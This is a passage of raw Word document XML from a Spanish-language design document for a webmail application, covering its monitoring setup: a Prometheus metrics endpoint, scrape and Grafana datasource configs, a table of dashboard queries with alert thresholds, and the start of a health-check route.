        <w:t xml:space="preserve"> reply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">elapsedTime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httpRequests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">inc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(labels)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Endpoint /metrics (solo accesible internamente via Nginx)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/metrics'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> reply) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    reply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Content-Type'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">contentType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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">metrics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230"/>
    <w:bookmarkStart w:id="231" w:name="grafana-dashboard"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.4.2 Grafana Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># monitoring/prometheus.yml</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">global</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">scrape_interval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 15s</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">evaluation_interval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 15s</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">external_labels</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cluster</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webmail6</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">replica</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'{{.ExternalURL}}'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">scrape_configs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'webmail6-api'</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'api:3000'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">metrics_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /metrics</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">scrape_interval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 15s</w:t>
      </w:r>
      <w:r>
        <w:br/>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'node-exporter'</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'node-exporter:9100'</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'nginx'</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'nginx:9113'</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'mongodb'</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'mongo:9216'</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'redis'</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'redis:9121'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># monitoring/grafana-datasources.yml</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">apiVersion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">datasources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Prometheus</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> prometheus</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxy</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://prometheus:9090</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">isDefault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editable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1788"/>
        <w:gridCol w:w="1788"/>
        <w:gridCol w:w="4343"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Panel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Umbral de Alerta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RPS (requests/seg)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">rate(webmail6_http_requests_total[5m])</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Latencia P95</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">histogram_quantile(0.95, rate(webmail6_http_request_duration_seconds_bucket[5m]))</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt; 2s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Error Rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">rate(webmail6_http_requests_total{status_code=~"5.."}[5m])</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt; 1%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conexiones IMAP activas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">webmail6_imap_connections_active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt; 200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conexiones WebSocket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">webmail6_websocket_connections_active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Emails sincronizados/min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">rate(webmail6_emails_synced_total[5m])</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt; 0.1 en 10 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Memoria Node.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">nodejs_heap_size_used_bytes / 1024 / 1024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt; 400MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Event Loop Lag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">nodejs_eventloop_lag_seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt; 0.5s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El dashboard base de Grafana ID 11159 (Node.js Application Dashboard) proporciona paneles pre-configurados para memoria, CPU, request rate, error rate y pausas de GC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[155]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. ID 11074 cubre métricas del sistema vía node-exporter.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="231"/>
    <w:bookmarkStart w:id="232" w:name="health-checks-healthlive-y-healthready"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.4.3 Health Checks /health/live y /health/ready</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/routes/health.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { FastifyInstance } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'fastify'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'mongoose'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { redis } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../config/redis.js'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> HealthStatus {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  status</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checks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responseTime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healthRoutes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> FastifyInstance) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Liveness: ¿El proceso está vivo?</w:t>
      </w:r>
      <w:r>
